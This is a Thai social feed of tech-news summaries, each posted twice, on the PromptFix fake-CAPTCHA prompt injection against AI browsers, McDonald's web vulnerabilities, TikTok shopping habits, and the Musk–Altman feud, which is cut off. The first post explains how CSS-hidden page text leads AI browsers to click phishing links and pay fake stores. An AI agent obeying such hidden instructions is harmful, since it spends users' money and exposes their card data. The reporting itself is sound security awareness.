• เมื่อ AI Browser กลายเป็นเหยื่อ – และ CAPTCHA ก็ไม่ใช่เกราะป้องกันอีกต่อไป

    ในยุคที่ AI browser อย่าง Comet จาก Perplexity ถูกออกแบบมาเพื่อช่วยผู้ใช้ทำงานออนไลน์ เช่น ซื้อของหรือจัดการอีเมลโดยอัตโนมัติ นักวิจัยจาก Guardio Labs กลับพบว่า AI เหล่านี้สามารถถูกหลอกให้ทำสิ่งอันตรายได้ง่ายกว่าที่คิด

    การโจมตีแบบใหม่ชื่อว่า “PromptFix” ใช้เทคนิคที่ดูเรียบง่ายแต่แฝงอันตราย นั่นคือ “CAPTCHA ปลอม” ที่ซ่อนคำสั่งอันตรายไว้ใน HTML โดยใช้ CSS เช่น display:none หรือ color:transparent เพื่อซ่อนข้อความที่ AI จะอ่านแต่มนุษย์มองไม่เห็น

    เมื่อ AI browser เจอ CAPTCHA ปลอมนี้ มันจะเข้าใจว่าเป็นคำสั่งที่ต้องทำตามทันที เช่น “ซื้อ Apple Watch จากเว็บนี้” หรือ “คลิกเพื่อดูผลเลือด” โดยไม่รู้เลยว่าเว็บนั้นเป็น phishing หรือร้านปลอมที่สร้างขึ้นมาเพื่อหลอกให้ AI กรอกข้อมูลบัตรเครดิตของผู้ใช้

    นักวิจัยเรียกปรากฏการณ์นี้ว่า “Scamlexity” – การหลอกลวงที่ซับซ้อนขึ้นในยุคที่ AI กลายเป็นผู้ช่วยที่เชื่อฟังโดยไม่ตั้งคำถาม และเมื่อ AI ถูกหลอก ผู้ใช้ก็กลายเป็นเหยื่อโดยไม่รู้ตัว

    สิ่งที่น่ากลัวคือ ถ้าแฮกเกอร์สามารถหลอก AI ได้หนึ่งตัว ก็สามารถใช้เทคนิคเดียวกันกับผู้ใช้หลายล้านคนที่ใช้ AI ตัวนั้นได้ทันที โดยไม่ต้องหลอกมนุษย์ทีละคนอีกต่อไป

    สรุปเนื้อหาเป็นหัวข้อ
    PromptFix เป็นการโจมตีแบบ prompt injection ที่ซ่อนคำสั่งไว้ใน CAPTCHA ปลอม
    AI browser เช่น Comet ถูกหลอกให้คลิก phishing link และซื้อสินค้าจากร้านปลอม
    คำสั่งถูกซ่อนไว้ใน HTML โดยใช้ CSS เพื่อให้มนุษย์มองไม่เห็น แต่ AI อ่านออก
    AI ทำตามคำสั่งทันที เช่น กรอกข้อมูลบัตรเครดิต หรือคลิกลิงก์อันตราย
    การโจมตีใช้เทคนิคจาก social engineering เพื่อหลอก AI โดยตรง
    นักวิจัยเรียกปรากฏการณ์นี้ว่า “Scamlexity” – ความซับซ้อนของการหลอกลวงในยุค AI
    การโจมตีสามารถขยายผลได้ทันทีเมื่อหลอก AI ได้หนึ่งตัว
    AI browser บางครั้งไม่แจ้งเตือนผู้ใช้ก่อนทำธุรกรรม
    CAPTCHA ปลอมถูกออกแบบให้ดูเหมือน “AI-friendly” เพื่อให้ AI ทำงานแทนมนุษย์
    การโจมตีสามารถนำไปสู่ drive-by download หรือการขโมยข้อมูล

    ข้อมูลเสริมจากภายนอก
    PromptFix เป็นวิวัฒนาการจาก ClickFix ซึ่งเคยใช้หลอกมนุษย์ให้รันสคริปต์อันตราย
    AI coding assistant เช่น Lovable ก็เคยถูกหลอกด้วยเทคนิคคล้ายกัน (VibeScamming)
    การโจมตีแบบนี้ไม่พึ่งพาการ glitch โมเดล แต่ใช้การหลอกลวงเชิงบริบท
    นักวิจัยเตือนว่า AI ต้องมีระบบความปลอดภัยตั้งแต่ต้น ไม่ใช่เสริมภายหลัง
    Darktrace ระบุว่า transparency และ explainability คือหัวใจของการป้องกัน AI

    คำเตือนในข่าว
    AI browser ที่ไม่มีระบบตรวจสอบคำสั่งอาจกลายเป็นเครื่องมือของแฮกเกอร์
    CAPTCHA ปลอมสามารถหลอก AI ได้ง่ายกว่าที่คิด และมนุษย์ไม่สามารถมองเห็นคำสั่งที่ซ่อนอยู่
    การพึ่งพา AI โดยไม่เข้าใจกลไกภายในอาจทำให้ผู้ใช้ตกเป็นเหยื่อโดยไม่รู้ตัว
    การโจมตีแบบ PromptFix สามารถขยายผลได้ทันทีโดยไม่ต้องหลอกมนุษย์ทีละคน
    หากไม่ออกแบบระบบ AI ให้ปลอดภัยตั้งแต่ต้น การแก้ไขภายหลังอาจไม่ทันต่อภัยคุกคาม

    https://hackread.com/ai-browsers-trick-paying-fake-stores-promptfix-attack/
    🎙️ เมื่อ AI Browser กลายเป็นเหยื่อ – และ CAPTCHA ก็ไม่ใช่เกราะป้องกันอีกต่อไป ในยุคที่ AI browser อย่าง Comet จาก Perplexity ถูกออกแบบมาเพื่อช่วยผู้ใช้ทำงานออนไลน์ เช่น ซื้อของหรือจัดการอีเมลโดยอัตโนมัติ นักวิจัยจาก Guardio Labs กลับพบว่า AI เหล่านี้สามารถถูกหลอกให้ทำสิ่งอันตรายได้ง่ายกว่าที่คิด การโจมตีแบบใหม่ชื่อว่า “PromptFix” ใช้เทคนิคที่ดูเรียบง่ายแต่แฝงอันตราย นั่นคือ “CAPTCHA ปลอม” ที่ซ่อนคำสั่งอันตรายไว้ใน HTML โดยใช้ CSS เช่น display:none หรือ color:transparent เพื่อซ่อนข้อความที่ AI จะอ่านแต่มนุษย์มองไม่เห็น เมื่อ AI browser เจอ CAPTCHA ปลอมนี้ มันจะเข้าใจว่าเป็นคำสั่งที่ต้องทำตามทันที เช่น “ซื้อ Apple Watch จากเว็บนี้” หรือ “คลิกเพื่อดูผลเลือด” โดยไม่รู้เลยว่าเว็บนั้นเป็น phishing หรือร้านปลอมที่สร้างขึ้นมาเพื่อหลอกให้ AI กรอกข้อมูลบัตรเครดิตของผู้ใช้ นักวิจัยเรียกปรากฏการณ์นี้ว่า “Scamlexity” – การหลอกลวงที่ซับซ้อนขึ้นในยุคที่ AI กลายเป็นผู้ช่วยที่เชื่อฟังโดยไม่ตั้งคำถาม และเมื่อ AI ถูกหลอก ผู้ใช้ก็กลายเป็นเหยื่อโดยไม่รู้ตัว สิ่งที่น่ากลัวคือ ถ้าแฮกเกอร์สามารถหลอก AI ได้หนึ่งตัว ก็สามารถใช้เทคนิคเดียวกันกับผู้ใช้หลายล้านคนที่ใช้ AI ตัวนั้นได้ทันที โดยไม่ต้องหลอกมนุษย์ทีละคนอีกต่อไป 📌 สรุปเนื้อหาเป็นหัวข้อ ➡️ PromptFix เป็นการโจมตีแบบ prompt injection ที่ซ่อนคำสั่งไว้ใน CAPTCHA ปลอม ➡️ AI browser เช่น Comet ถูกหลอกให้คลิก phishing link และซื้อสินค้าจากร้านปลอม ➡️ คำสั่งถูกซ่อนไว้ใน HTML โดยใช้ CSS เพื่อให้มนุษย์มองไม่เห็น แต่ AI อ่านออก ➡️ AI ทำตามคำสั่งทันที เช่น กรอกข้อมูลบัตรเครดิต หรือคลิกลิงก์อันตราย ➡️ การโจมตีใช้เทคนิคจาก social engineering เพื่อหลอก AI โดยตรง ➡️ นักวิจัยเรียกปรากฏการณ์นี้ว่า “Scamlexity” – ความซับซ้อนของการหลอกลวงในยุค AI ➡️ การโจมตีสามารถขยายผลได้ทันทีเมื่อหลอก AI ได้หนึ่งตัว ➡️ AI browser บางครั้งไม่แจ้งเตือนผู้ใช้ก่อนทำธุรกรรม ➡️ CAPTCHA ปลอมถูกออกแบบให้ดูเหมือน “AI-friendly” เพื่อให้ AI ทำงานแทนมนุษย์ ➡️ การโจมตีสามารถนำไปสู่ drive-by download หรือการขโมยข้อมูล ✅ ข้อมูลเสริมจากภายนอก ➡️ PromptFix เป็นวิวัฒนาการจาก ClickFix ซึ่งเคยใช้หลอกมนุษย์ให้รันสคริปต์อันตราย ➡️ AI coding assistant เช่น Lovable ก็เคยถูกหลอกด้วยเทคนิคคล้ายกัน (VibeScamming) ➡️ การโจมตีแบบนี้ไม่พึ่งพาการ glitch โมเดล แต่ใช้การหลอกลวงเชิงบริบท ➡️ นักวิจัยเตือนว่า AI ต้องมีระบบความปลอดภัยตั้งแต่ต้น ไม่ใช่เสริมภายหลัง ➡️ Darktrace ระบุว่า transparency และ explainability คือหัวใจของการป้องกัน AI ‼️ คำเตือนในข่าว ⛔ AI browser ที่ไม่มีระบบตรวจสอบคำสั่งอาจกลายเป็นเครื่องมือของแฮกเกอร์ ⛔ CAPTCHA ปลอมสามารถหลอก AI ได้ง่ายกว่าที่คิด และมนุษย์ไม่สามารถมองเห็นคำสั่งที่ซ่อนอยู่ ⛔ การพึ่งพา AI โดยไม่เข้าใจกลไกภายในอาจทำให้ผู้ใช้ตกเป็นเหยื่อโดยไม่รู้ตัว ⛔ การโจมตีแบบ PromptFix สามารถขยายผลได้ทันทีโดยไม่ต้องหลอกมนุษย์ทีละคน ⛔ หากไม่ออกแบบระบบ AI ให้ปลอดภัยตั้งแต่ต้น การแก้ไขภายหลังอาจไม่ทันต่อภัยคุกคาม https://hackread.com/ai-browsers-trick-paying-fake-stores-promptfix-attack/
    HACKREAD.COM
    AI Browsers Can Be Tricked Into Paying Fake Stores in PromptFix Attack
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 72 มุมมอง 0 รีวิว
  • จากฟรีนักเก็ตสู่ช่องโหว่ระดับองค์กร – เมื่อ McDonald’s ลืมล็อกประตูดิจิทัล

    เรื่องเริ่มต้นจากนักวิจัยด้านความปลอดภัยนามว่า “BobDaHacker” ที่แค่อยากได้ McNuggets ฟรีจากแอปของ McDonald’s แต่กลับพบว่าการตรวจสอบคะแนนสะสมทำแค่ฝั่งผู้ใช้ (client-side) ทำให้สามารถปลดล็อกของรางวัลได้แม้ไม่มีคะแนน

    เมื่อเขาขุดลึกลงไป ก็พบช่องโหว่ใน “Feel-Good Design Hub” ซึ่งเป็นแพลตฟอร์มภายในของ McDonald’s ที่ใช้สำหรับจัดการแบรนด์และสื่อการตลาดในกว่า 120 ประเทศ โดยระบบเดิมใช้รหัสผ่านฝั่งผู้ใช้ในการป้องกันข้อมูลลับ!

    แม้ McDonald’s จะใช้เวลาถึง 3 เดือนในการแก้ไขระบบให้มีการล็อกอินแบบแยกสำหรับพนักงานและพันธมิตร แต่ Bob พบว่าเพียงแค่เปลี่ยนคำว่า “login” เป็น “register” ใน URL ก็สามารถสร้างบัญชีใหม่และเข้าถึงข้อมูลลับได้ทันที

    ที่น่าตกใจยิ่งกว่าคือระบบส่งรหัสผ่านแบบ plain-text ทางอีเมล และไม่มีช่องทางรายงานช่องโหว่อย่างเป็นทางการ ทำให้ Bob ต้องโทรไปยังสำนักงานใหญ่และสุ่มชื่อพนักงานจาก LinkedIn เพื่อให้มีคนรับเรื่อง

    นอกจากนี้ยังพบ API Key ที่รั่ว, ระบบค้นหาที่เปิดเผยข้อมูลพนักงานทั่วโลก, ช่องโหว่ในระบบ GRS ที่เปิดให้ใครก็ได้ inject HTML และแม้แต่แอปทดลองของร้าน CosMc’s ที่สามารถใช้คูปองไม่จำกัดและแก้ไขคำสั่งซื้อได้ตามใจ

    ข้อมูลในข่าว
    BobDaHacker พบช่องโหว่จากการตรวจสอบคะแนนสะสมในแอป McDonald’s ที่ทำแค่ฝั่ง client
    ระบบ Feel-Good Design Hub ใช้รหัสผ่านฝั่ง client ในการป้องกันข้อมูลภายใน
    เปลี่ยน “login” เป็น “register” ใน URL สามารถสร้างบัญชีและเข้าถึงข้อมูลลับได้
    ระบบส่งรหัสผ่านแบบ plain-text ทางอีเมล ซึ่งเป็นแนวปฏิบัติที่ไม่ปลอดภัย
    ไม่มีช่องทางรายงานช่องโหว่อย่างเป็นทางการ ต้องโทรสุ่มชื่อพนักงานจาก LinkedIn
    พบ API Key และ Algolia Index ที่รั่ว ทำให้สามารถส่ง phishing และดูข้อมูลพนักงาน
    ระบบ TRT เปิดให้พนักงานทั่วไปค้นหาอีเมลของผู้บริหารและใช้ฟีเจอร์ “impersonation”
    GRS Panel ไม่มีการยืนยันตัวตน ทำให้สามารถ inject HTML ได้
    แอป CosMc’s มีช่องโหว่ให้ใช้คูปองไม่จำกัดและแก้ไขคำสั่งซื้อได้

    ข้อมูลเสริมจากภายนอก
    การตรวจสอบฝั่ง client เป็นช่องโหว่พื้นฐานที่ควรหลีกเลี่ยงในระบบที่เกี่ยวข้องกับสิทธิ์หรือรางวัล
    การส่งรหัสผ่านแบบ plain-text ขัดกับมาตรฐานความปลอดภัยสมัยใหม่ เช่น OWASP
    security.txt เป็นมาตรฐานที่ใช้ระบุช่องทางรายงานช่องโหว่ แต่ McDonald’s ลบไฟล์นี้ออก
    การไม่มีช่องทางรายงานที่ชัดเจนทำให้นักวิจัยอาจละทิ้งการแจ้งเตือน
    การใช้ API Key แบบ hardcoded ใน JavaScript เป็นช่องโหว่ที่พบได้บ่อยในเว็บแอป
    การเปิดเผยข้อมูลพนักงานระดับผู้บริหารอาจนำไปสู่ targeted phishing หรือ social engineering

    https://www.tomshardware.com/tech-industry/cyber-security/prompted-by-free-nuggets-security-researcher-uncovers-staggering-mcdonalds-internal-platform-vulnerability-changing-login-to-register-in-url-prompted-site-to-issue-plain-text-password-for-a-new-account
    🍟 จากฟรีนักเก็ตสู่ช่องโหว่ระดับองค์กร – เมื่อ McDonald’s ลืมล็อกประตูดิจิทัล เรื่องเริ่มต้นจากนักวิจัยด้านความปลอดภัยนามว่า “BobDaHacker” ที่แค่อยากได้ McNuggets ฟรีจากแอปของ McDonald’s แต่กลับพบว่าการตรวจสอบคะแนนสะสมทำแค่ฝั่งผู้ใช้ (client-side) ทำให้สามารถปลดล็อกของรางวัลได้แม้ไม่มีคะแนน เมื่อเขาขุดลึกลงไป ก็พบช่องโหว่ใน “Feel-Good Design Hub” ซึ่งเป็นแพลตฟอร์มภายในของ McDonald’s ที่ใช้สำหรับจัดการแบรนด์และสื่อการตลาดในกว่า 120 ประเทศ โดยระบบเดิมใช้รหัสผ่านฝั่งผู้ใช้ในการป้องกันข้อมูลลับ! แม้ McDonald’s จะใช้เวลาถึง 3 เดือนในการแก้ไขระบบให้มีการล็อกอินแบบแยกสำหรับพนักงานและพันธมิตร แต่ Bob พบว่าเพียงแค่เปลี่ยนคำว่า “login” เป็น “register” ใน URL ก็สามารถสร้างบัญชีใหม่และเข้าถึงข้อมูลลับได้ทันที ที่น่าตกใจยิ่งกว่าคือระบบส่งรหัสผ่านแบบ plain-text ทางอีเมล และไม่มีช่องทางรายงานช่องโหว่อย่างเป็นทางการ ทำให้ Bob ต้องโทรไปยังสำนักงานใหญ่และสุ่มชื่อพนักงานจาก LinkedIn เพื่อให้มีคนรับเรื่อง นอกจากนี้ยังพบ API Key ที่รั่ว, ระบบค้นหาที่เปิดเผยข้อมูลพนักงานทั่วโลก, ช่องโหว่ในระบบ GRS ที่เปิดให้ใครก็ได้ inject HTML และแม้แต่แอปทดลองของร้าน CosMc’s ที่สามารถใช้คูปองไม่จำกัดและแก้ไขคำสั่งซื้อได้ตามใจ ✅ ข้อมูลในข่าว ➡️ BobDaHacker พบช่องโหว่จากการตรวจสอบคะแนนสะสมในแอป McDonald’s ที่ทำแค่ฝั่ง client ➡️ ระบบ Feel-Good Design Hub ใช้รหัสผ่านฝั่ง client ในการป้องกันข้อมูลภายใน ➡️ เปลี่ยน “login” เป็น “register” ใน URL สามารถสร้างบัญชีและเข้าถึงข้อมูลลับได้ ➡️ ระบบส่งรหัสผ่านแบบ plain-text ทางอีเมล ซึ่งเป็นแนวปฏิบัติที่ไม่ปลอดภัย ➡️ ไม่มีช่องทางรายงานช่องโหว่อย่างเป็นทางการ ต้องโทรสุ่มชื่อพนักงานจาก LinkedIn ➡️ พบ API Key และ Algolia Index ที่รั่ว ทำให้สามารถส่ง phishing และดูข้อมูลพนักงาน ➡️ ระบบ TRT เปิดให้พนักงานทั่วไปค้นหาอีเมลของผู้บริหารและใช้ฟีเจอร์ “impersonation” ➡️ GRS Panel ไม่มีการยืนยันตัวตน ทำให้สามารถ inject HTML ได้ ➡️ แอป CosMc’s มีช่องโหว่ให้ใช้คูปองไม่จำกัดและแก้ไขคำสั่งซื้อได้ ✅ ข้อมูลเสริมจากภายนอก ➡️ การตรวจสอบฝั่ง client เป็นช่องโหว่พื้นฐานที่ควรหลีกเลี่ยงในระบบที่เกี่ยวข้องกับสิทธิ์หรือรางวัล ➡️ การส่งรหัสผ่านแบบ plain-text ขัดกับมาตรฐานความปลอดภัยสมัยใหม่ เช่น OWASP ➡️ security.txt เป็นมาตรฐานที่ใช้ระบุช่องทางรายงานช่องโหว่ แต่ McDonald’s ลบไฟล์นี้ออก ➡️ การไม่มีช่องทางรายงานที่ชัดเจนทำให้นักวิจัยอาจละทิ้งการแจ้งเตือน ➡️ การใช้ API Key แบบ hardcoded ใน JavaScript เป็นช่องโหว่ที่พบได้บ่อยในเว็บแอป ➡️ การเปิดเผยข้อมูลพนักงานระดับผู้บริหารอาจนำไปสู่ targeted phishing หรือ social engineering https://www.tomshardware.com/tech-industry/cyber-security/prompted-by-free-nuggets-security-researcher-uncovers-staggering-mcdonalds-internal-platform-vulnerability-changing-login-to-register-in-url-prompted-site-to-issue-plain-text-password-for-a-new-account
    0 ความคิดเห็น 0 การแบ่งปัน 136 มุมมอง 0 รีวิว
  • เมื่อ TikTok กลายเป็นห้างสรรพสินค้า: พลังของวิดีโอสั้นที่เปลี่ยนใจผู้ซื้อ

    ลองนึกภาพว่าเราเลื่อนดู TikTok แล้วเจอคนธรรมดารีวิวสบู่ล้างหน้าแบบบ้าน ๆ ไม่ใช่ดารา ไม่ใช่แบรนด์ดัง แต่พูดจริง ใช้จริง และดูน่าเชื่อถือ—คุณอาจจะซื้อทันทีโดยไม่รู้ตัว

    จากผลสำรวจของ Omnisend พบว่า 66% ของผู้บริโภคเชื่อถือคำแนะนำจากผู้ใช้ทั่วไปบนโซเชียลมีเดีย มากกว่าคำแนะนำจากดาราหรืออินฟลูเอนเซอร์ เพราะคนดังมักได้รับค่าจ้างจากแบรนด์

    วิดีโอที่มีประสิทธิภาพที่สุดคือคลิปสั้น 10–15 วินาที ที่ถ่ายแบบไม่เป็นทางการ พูดจากมุมมองส่วนตัว เหมือนเพื่อนแนะนำเพื่อน ไม่ใช่โฆษณา

    นอกจากนี้ 70% ของผู้ตอบแบบสอบถามใช้โซเชียลมีเดียในการ “หาข้อมูลก่อนซื้อ” โดยให้ความสำคัญกับรีวิวที่ได้รับการยืนยัน และคอมเมนต์จากผู้ใช้จริง

    แม้ TikTok จะไม่ได้รับเครดิตตรง ๆ ว่าเป็นตัวกระตุ้นยอดขาย แต่การเห็นสินค้าซ้ำ ๆ บนแพลตฟอร์มนี้ทำให้ผู้บริโภค “จำ” และ “เชื่อ” เมื่อเห็นสินค้านั้นในช่องทางอื่น

    พฤติกรรมผู้บริโภคยุคโซเชียล
    66% เชื่อคำแนะนำจากผู้ใช้ทั่วไปมากกว่าคนดัง
    70% ใช้โซเชียลมีเดียในการหาข้อมูลก่อนซื้อ
    45% มีแนวโน้มซื้อสินค้าที่กำลังเป็นกระแสบนแพลตฟอร์ม

    ประสิทธิภาพของวิดีโอสั้น
    วิดีโอ 10–15 วินาทีแบบไม่เป็นทางการให้ผลดีที่สุด
    การพูดจากมุมมองส่วนตัวสร้างความน่าเชื่อถือ
    การเห็นสินค้าซ้ำ ๆ บนแพลตฟอร์มช่วยกระตุ้นการจดจำ

    ความเปลี่ยนแปลงในกลยุทธ์การตลาด
    TikTok กลายเป็นจุดเริ่มต้นของการตัดสินใจซื้อ
    แบรนด์ต้องปรับตัวจากการใช้คนดัง มาใช้ผู้ใช้จริง
    การสร้างคอนเทนต์ที่ “ดูจริง” สำคัญกว่าความสวยงาม

    ข้อมูลเสริมจากวงการ e-commerce
    Shoppable Videos ช่วยลดขั้นตอนจากการดูไปสู่การซื้อ
    82% ของผู้ชมตัดสินใจซื้อหลังดูวิดีโอสินค้า
    Instagram มีผู้ใช้ที่ช้อปผ่านแพลตฟอร์มเกือบครึ่งหนึ่งทุกสัปดาห์

    https://www.thestar.com.my/tech/tech-news/2025/08/16/these-kinds-of-social-media-videos-are-most-likely-to-convert-shoppers
    🧠 เมื่อ TikTok กลายเป็นห้างสรรพสินค้า: พลังของวิดีโอสั้นที่เปลี่ยนใจผู้ซื้อ ลองนึกภาพว่าเราเลื่อนดู TikTok แล้วเจอคนธรรมดารีวิวสบู่ล้างหน้าแบบบ้าน ๆ ไม่ใช่ดารา ไม่ใช่แบรนด์ดัง แต่พูดจริง ใช้จริง และดูน่าเชื่อถือ—คุณอาจจะซื้อทันทีโดยไม่รู้ตัว จากผลสำรวจของ Omnisend พบว่า 66% ของผู้บริโภคเชื่อถือคำแนะนำจากผู้ใช้ทั่วไปบนโซเชียลมีเดีย มากกว่าคำแนะนำจากดาราหรืออินฟลูเอนเซอร์ เพราะคนดังมักได้รับค่าจ้างจากแบรนด์ วิดีโอที่มีประสิทธิภาพที่สุดคือคลิปสั้น 10–15 วินาที ที่ถ่ายแบบไม่เป็นทางการ พูดจากมุมมองส่วนตัว เหมือนเพื่อนแนะนำเพื่อน ไม่ใช่โฆษณา นอกจากนี้ 70% ของผู้ตอบแบบสอบถามใช้โซเชียลมีเดียในการ “หาข้อมูลก่อนซื้อ” โดยให้ความสำคัญกับรีวิวที่ได้รับการยืนยัน และคอมเมนต์จากผู้ใช้จริง แม้ TikTok จะไม่ได้รับเครดิตตรง ๆ ว่าเป็นตัวกระตุ้นยอดขาย แต่การเห็นสินค้าซ้ำ ๆ บนแพลตฟอร์มนี้ทำให้ผู้บริโภค “จำ” และ “เชื่อ” เมื่อเห็นสินค้านั้นในช่องทางอื่น ✅ พฤติกรรมผู้บริโภคยุคโซเชียล ➡️ 66% เชื่อคำแนะนำจากผู้ใช้ทั่วไปมากกว่าคนดัง ➡️ 70% ใช้โซเชียลมีเดียในการหาข้อมูลก่อนซื้อ ➡️ 45% มีแนวโน้มซื้อสินค้าที่กำลังเป็นกระแสบนแพลตฟอร์ม ✅ ประสิทธิภาพของวิดีโอสั้น ➡️ วิดีโอ 10–15 วินาทีแบบไม่เป็นทางการให้ผลดีที่สุด ➡️ การพูดจากมุมมองส่วนตัวสร้างความน่าเชื่อถือ ➡️ การเห็นสินค้าซ้ำ ๆ บนแพลตฟอร์มช่วยกระตุ้นการจดจำ ✅ ความเปลี่ยนแปลงในกลยุทธ์การตลาด ➡️ TikTok กลายเป็นจุดเริ่มต้นของการตัดสินใจซื้อ ➡️ แบรนด์ต้องปรับตัวจากการใช้คนดัง มาใช้ผู้ใช้จริง ➡️ การสร้างคอนเทนต์ที่ “ดูจริง” สำคัญกว่าความสวยงาม ✅ ข้อมูลเสริมจากวงการ e-commerce ➡️ Shoppable Videos ช่วยลดขั้นตอนจากการดูไปสู่การซื้อ ➡️ 82% ของผู้ชมตัดสินใจซื้อหลังดูวิดีโอสินค้า ➡️ Instagram มีผู้ใช้ที่ช้อปผ่านแพลตฟอร์มเกือบครึ่งหนึ่งทุกสัปดาห์ https://www.thestar.com.my/tech/tech-news/2025/08/16/these-kinds-of-social-media-videos-are-most-likely-to-convert-shoppers
    WWW.THESTAR.COM.MY
    These kinds of social media videos are most likely to convert shoppers
    Many people don't trust influencer and celebrity product recommendations, a survey says.
    0 ความคิดเห็น 0 การแบ่งปัน 161 มุมมอง 0 รีวิว
  • เมื่ออดีตพันธมิตรถูกแปรเปลี่ยนเป็นศัตรู: Elon Musk vs Sam Altman กับสงคราม AI ที่ลุกลามสู่โลกโซเชียล

    ในเดือนสิงหาคม 2025 ความขัดแย้งระหว่าง Elon Musk และ Sam Altman กลับมาร้อนแรงอีกครั้ง หลังจากที่ Musk กล่าวหาว่า Apple ลำเอียงในการจัดอันดับแอปใน App Store โดยให้ ChatGPT ของ OpenAI อยู่เหนือกว่า Grok ซึ่งเป็นแชตบอทของ xAI บริษัทที่ Musk ก่อตั้งขึ้น

    Musk ระบุว่า Apple กระทำการละเมิดกฎหมายต่อต้านการผูกขาดอย่างชัดเจน และประกาศว่าจะดำเนินคดีทางกฎหมายทันที ขณะที่ Altman ตอบโต้ด้วยการกล่าวหาว่า Musk เองก็เคยปรับอัลกอริธึมของแพลตฟอร์ม X เพื่อเอื้อประโยชน์ให้กับตัวเองและบริษัทในเครือ

    การโต้ตอบกันบนแพลตฟอร์ม X กลายเป็นการปะทะกันอย่างดุเดือด โดย Muskเรียก Altman ว่า “คนโกหก” และอ้างว่าโพสต์ของ Altman ได้รับยอดวิวมากกว่าโพสต์ของเขา แม้จะมีผู้ติดตามมากกว่าถึง 50 เท่า Altman ตอบกลับด้วยการท้าทายให้ Musk เซ็นรับรองว่าไม่เคยปรับอัลกอริธึมเพื่อทำร้ายคู่แข่ง

    เบื้องหลังของความขัดแย้งนี้ย้อนกลับไปถึงปี 2018 เมื่อ Musk ถอนตัวจากบอร์ดของ OpenAI และกล่าวหาว่าองค์กรละทิ้งพันธกิจเดิมในการสร้าง AI เพื่อมนุษยชาติ โดยหันไปเน้นผลกำไรร่วมกับ Microsoft

    นอกจากนี้ ยังมีประเด็นที่ Musk แชร์ภาพหน้าจอจาก ChatGPT ที่ตอบว่า “Elon Musk” น่าเชื่อถือกว่า Altman แต่ผู้ใช้หลายคนพบว่า หากตั้งคำถามใหม่หรือปรับบริบทก่อนถาม คำตอบจะเปลี่ยนเป็น “Sam Altman” ซึ่งสะท้อนถึงความอ่อนไหวของ AI ต่อการตั้งคำถาม

    จุดเริ่มต้นของความขัดแย้ง
    Musk และ Altman ร่วมก่อตั้ง OpenAI ในปี 2015
    Musk ถอนตัวจากบอร์ดในปี 2018 ด้วยเหตุผลด้านทิศทางองค์กร
    ความขัดแย้งทวีความรุนแรงเมื่อ OpenAI ร่วมมือกับ Microsoft

    เหตุการณ์ล่าสุดในเดือนสิงหาคม 2025
    Musk กล่าวหา Apple ว่าลำเอียงต่อ ChatGPT ใน App Store
    Altman ตอบโต้โดยกล่าวหาว่า Musk ปรับอัลกอริธึม X เพื่อผลประโยชน์ส่วนตัว
    การโต้ตอบกลายเป็นการด่าทอกันอย่างเปิดเผยบนโซเชียล

    ประเด็นเรื่องความน่าเชื่อถือของ AI
    Musk แชร์ภาพ ChatGPT ตอบว่าเขาน่าเชื่อถือกว่า Altman
    ผู้ใช้หลายคนพบว่า AI เปลี่ยนคำตอบตามบริบทของคำถาม
    สะท้อนถึงความอ่อนไหวของโมเดลต่อการตั้งคำถามและการ “ป้อนคำ”

    การเปรียบเทียบ Grok กับ ChatGPT
    Musk อ้างว่า Grok ดีกว่า GPT-5
    Altmanไม่ตอบตรง แต่เน้นโจมตีพฤติกรรมของ Musk
    Grok เคยถูกวิจารณ์เรื่องการให้ข้อมูลเท็จและเนื้อหาขัดแย้ง

    https://www.thestar.com.my/tech/tech-news/2025/08/16/039you-liar039-elon-musk-and-sam-altman039s-ai-battle-erupts-on-social-media
    🧠 เมื่ออดีตพันธมิตรถูกแปรเปลี่ยนเป็นศัตรู: Elon Musk vs Sam Altman กับสงคราม AI ที่ลุกลามสู่โลกโซเชียล ในเดือนสิงหาคม 2025 ความขัดแย้งระหว่าง Elon Musk และ Sam Altman กลับมาร้อนแรงอีกครั้ง หลังจากที่ Musk กล่าวหาว่า Apple ลำเอียงในการจัดอันดับแอปใน App Store โดยให้ ChatGPT ของ OpenAI อยู่เหนือกว่า Grok ซึ่งเป็นแชตบอทของ xAI บริษัทที่ Musk ก่อตั้งขึ้น Musk ระบุว่า Apple กระทำการละเมิดกฎหมายต่อต้านการผูกขาดอย่างชัดเจน และประกาศว่าจะดำเนินคดีทางกฎหมายทันที ขณะที่ Altman ตอบโต้ด้วยการกล่าวหาว่า Musk เองก็เคยปรับอัลกอริธึมของแพลตฟอร์ม X เพื่อเอื้อประโยชน์ให้กับตัวเองและบริษัทในเครือ การโต้ตอบกันบนแพลตฟอร์ม X กลายเป็นการปะทะกันอย่างดุเดือด โดย Muskเรียก Altman ว่า “คนโกหก” และอ้างว่าโพสต์ของ Altman ได้รับยอดวิวมากกว่าโพสต์ของเขา แม้จะมีผู้ติดตามมากกว่าถึง 50 เท่า Altman ตอบกลับด้วยการท้าทายให้ Musk เซ็นรับรองว่าไม่เคยปรับอัลกอริธึมเพื่อทำร้ายคู่แข่ง เบื้องหลังของความขัดแย้งนี้ย้อนกลับไปถึงปี 2018 เมื่อ Musk ถอนตัวจากบอร์ดของ OpenAI และกล่าวหาว่าองค์กรละทิ้งพันธกิจเดิมในการสร้าง AI เพื่อมนุษยชาติ โดยหันไปเน้นผลกำไรร่วมกับ Microsoft นอกจากนี้ ยังมีประเด็นที่ Musk แชร์ภาพหน้าจอจาก ChatGPT ที่ตอบว่า “Elon Musk” น่าเชื่อถือกว่า Altman แต่ผู้ใช้หลายคนพบว่า หากตั้งคำถามใหม่หรือปรับบริบทก่อนถาม คำตอบจะเปลี่ยนเป็น “Sam Altman” ซึ่งสะท้อนถึงความอ่อนไหวของ AI ต่อการตั้งคำถาม ✅ จุดเริ่มต้นของความขัดแย้ง ➡️ Musk และ Altman ร่วมก่อตั้ง OpenAI ในปี 2015 ➡️ Musk ถอนตัวจากบอร์ดในปี 2018 ด้วยเหตุผลด้านทิศทางองค์กร ➡️ ความขัดแย้งทวีความรุนแรงเมื่อ OpenAI ร่วมมือกับ Microsoft ✅ เหตุการณ์ล่าสุดในเดือนสิงหาคม 2025 ➡️ Musk กล่าวหา Apple ว่าลำเอียงต่อ ChatGPT ใน App Store ➡️ Altman ตอบโต้โดยกล่าวหาว่า Musk ปรับอัลกอริธึม X เพื่อผลประโยชน์ส่วนตัว ➡️ การโต้ตอบกลายเป็นการด่าทอกันอย่างเปิดเผยบนโซเชียล ✅ ประเด็นเรื่องความน่าเชื่อถือของ AI ➡️ Musk แชร์ภาพ ChatGPT ตอบว่าเขาน่าเชื่อถือกว่า Altman ➡️ 